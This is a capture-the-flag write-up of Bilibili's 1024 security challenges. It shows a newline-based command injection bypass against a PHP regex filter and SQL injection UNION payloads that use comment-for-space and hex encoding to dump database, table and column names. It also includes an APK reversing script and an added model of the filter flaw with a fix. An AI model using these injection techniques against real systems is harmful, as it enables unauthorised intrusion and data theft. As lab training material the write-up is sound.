Challenge URL: https://www.bilibili.com/blackboard/20211024.html

Challenge 1

AES decryption. Password: happy_1024_2233; the ciphertext is the two lines of characters at the bottom, which have to be joined into a single line (I really did not expect that at first!)

Online decryption tool: http://tool.chacuo.net/cryptaes

Challenge 2

Open the developer tools (F12); after some searching, the hidden flag turns up in home.vue.

Challenge 3

Download the archive; extracting it gives eval.php:

```php
<?php
/*
bilibili- ( ゜- ゜)つロ Cheers~
uat: http://192.168.3.2/uat/eval.php
pro: http://security.bilibili.com/sec1024/q/pro/eval.php
*/
$args = @$_GET['args'];
if (count($args) >3) {
exit();
}
for ( $i=0; $i<count($args); $i++ ){
if ( !preg_match('/^\w+$/', $args[$i]) ) {
exit();
}
}
// todo: other filter
$cmd = "/bin/2233 " . implode(" ", $args);
exec($cmd, $out);
for ($i=0; $i<count($out); $i++){
echo($out[$i]);
echo('<br>');
}
?>
```

The general idea is to pass a command in through the args parameter to find the flag. The args array is limited to at most 3 elements, and the regex /^\w+$/ filters out special characters such as / and .; on top of that, args is appended to /bin/2233, so a command passed in directly does not run as intended. This can be bypassed by ending the value with a newline (%0a): in PCRE, `$` also matches just before a trailing newline (only the D modifier or \z anchors at the true end of the string), so the newline survives the check and reaches the command string, after which commands can be executed.
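To make the filter's weak spot concrete, here is an added Python model of the checks in eval.php (my example, not the challenge's code); it only builds the command string and executes nothing. Python's `$` behaves like PCRE's here, so the same trailing-newline input passes the original pattern and is rejected once the anchor is changed to `\Z` (PCRE `\z` or the `D` modifier); the helper names `build_cmd` and `reaches_shell_unbroken` are mine.

```python
import re

# Filter as it appears in eval.php: each argument must satisfy /^\w+$/.
# Both PCRE and Python's re let "$" match just before a string-final "\n".
WEAK = re.compile(r"^\w+$")
# Hardened variant: "\Z" matches only at the absolute end of the string
# (the PCRE equivalents are "\z" or the "D" modifier).
STRICT = re.compile(r"^\w+\Z")


def build_cmd(args, pattern=WEAK):
    """Mirror eval.php's checks and return the string it would hand to exec().

    Returns None when the filter rejects the input. Nothing is executed;
    the point is to inspect what would reach the shell.
    """
    if len(args) > 3:
        return None
    for arg in args:
        if not pattern.match(arg):
            return None
    return "/bin/2233 " + " ".join(args)


def reaches_shell_unbroken(cmd):
    """Defender check: a newline inside the command string means the shell
    treats what follows it as a separate command, so the single-command
    assumption behind '/bin/2233 <args>' no longer holds."""
    return cmd is not None and "\n" not in cmd


if __name__ == "__main__":
    # Constructed input: the first argument carries the trailing %0a (newline)
    # from the writeup; "ls" is simply whatever ends up on the next line.
    probe = ["a\n", "ls"]
    print(repr(build_cmd(probe)))            # '/bin/2233 a\n ls' -> the filter let it through
    print(build_cmd(probe, STRICT))          # None               -> \Z rejects the newline
    print(reaches_shell_unbroken(build_cmd(["a", "b"])))  # True
```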

ls lists the files in the current directory.

cat passwd gives the flag.

Challenge 4

Same URL as Challenge 2, but I had no idea at first. A later hint said SQL injection; opening the developer tools (F12) again, I found an API endpoint that takes some log-query parameters via POST.

There is an injection point in user_name; spaces are filtered.

Get the database name: q

```json
{
"user_id": "",
"user_name": "1/**/union/**/select/**/1,2,3,4,database()",
"action": "",
"page": 1,
"size": 20
}
```

Get the table names: flag, log, user

```json
{
"user_id": "",
"user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()",
"action": "",
"page": 1,
"size": 20
}
```

Get the column names: id (quotes cannot be used here, otherwise they close the string early and cause an error; hex gets around this: flag in hex is 666c6167, with 0x prepended)

```json
{
"user_id": "",
"user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167",
"action": "",
"page": 1,
"size": 20
}
```

Final step: get the flag

```json
{
"user_id": "",
"user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag",
"action": "",
"page": 1,
"size": 20
}
```

Challenge 5

Download test.apk; after entering a username and password and submitting, it responds with “还差一点点~~” (“almost there~~”).

So would the right input give the flag? I was losing sight of the challenge: this one is about reverse engineering~

The following is based on other players' solutions:

Open it in JADX

Encrypt is the encryption routine; take the two strings in MainActivity and apply the steps of Encrypt in reverse once, i.e. one base64 decode and one XOR with 3. The two results combine into a single flag.

Solution script

```python
import base64

# The two byte arrays taken from MainActivity in JADX (base64 text stored as byte values)
obyteArray = [0x59, 0x57, 0x42, 0x6c, 0x4f, 0x6d, 0x5a, 0x6e, 0x4e, 0x6a, 0x41, 0x75, 0x4f, 0x6d, 0x4a, 0x6d, 0x4e, 0x7a,
              0x41, 0x78, 0x4f, 0x32, 0x59, 0x3d]

code = [0x4e, 0x6a, 0x49, 0x31, 0x4f, 0x7a, 0x41, 0x33, 0x59, 0x47, 0x41, 0x75, 0x4e, 0x6a, 0x4e, 0x6d, 0x4e, 0x7a,
        0x63, 0x37, 0x59, 0x6d, 0x55, 0x3d]

# Step 1 (reverse of Encrypt): turn the byte values back into base64 text and decode it
user = "".join(chr(b) for b in obyteArray)
password = "".join(chr(b) for b in code)

print(base64.b64decode(user))
print(base64.b64decode(password))

a1 = base64.b64decode(user).decode("utf-8")
a2 = base64.b64decode(password).decode("utf-8")

# Step 2 (reverse of Encrypt): XOR every character with 3
ans = "".join(chr(ord(c) ^ 3) for c in a1)
ans1 = "".join(chr(ord(c) ^ 3) for c in a2)

print(ans)
print(ans1)
```

Challenge 6

Reference: https://www.52pojie.cn/thread-1532604-1-1.html

Challenge 7

Log analysis: find all the malicious IPs. Part of the answer is as follows:

jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg